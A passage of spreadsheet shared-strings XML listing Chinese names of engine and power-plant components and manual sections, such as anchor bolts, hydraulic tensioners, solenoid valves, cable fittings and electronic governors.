        <charset val="134"/>
      </rPr>
      <t>端部垫块数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓测量表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓液压拉伸器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓液压拉伸器螺栓</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第二册封面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第二册说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第三册封面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第三册说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第三册说明书，编码册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第一册封面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第一册说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>点火电缆管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气转换器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/2</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量减少</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力减小</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀连接器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀铭牌</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀衔铁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁继电器的代码</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁继电器箱描述</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁接头</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁线圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动动力供应</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动机安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动机带动的电位计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动机固定销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动机械连锁部件装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动机组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动马达</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动起动机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动起动机，高压油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电机电位器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电极</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电近位探测仪</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>11MM</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电近位探测仪安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电控部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电控气缸注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电控台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电控箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电控注油器电缆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆安装说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆编号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆标号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆格兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆格栏</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆管道</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆管道的铜衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆和连接件的生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆卡子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆密封螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆填料函，</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆填料函，附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆填料函止动螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆通道</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆托架附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆托盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电力驱动液压动力系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电路板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电路断流器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电路图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电路图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电路图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-TC</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电脑控制监测</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机诊断系统，硬件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电脑控制监管系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电平开关布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气和液压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气件焊接</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气件和电缆桥架安装指导</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气连接测试</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气箱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位计钢丝滚</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位计壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位探测仪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位探测仪探头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位探测仪跳动量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电压变阻器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电站安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电站安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电站配置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>VIT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统调整及说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子测速装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子程序储存器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子导向装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子电压表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子调速器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子调速器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子调速器设备</t>
    </r>
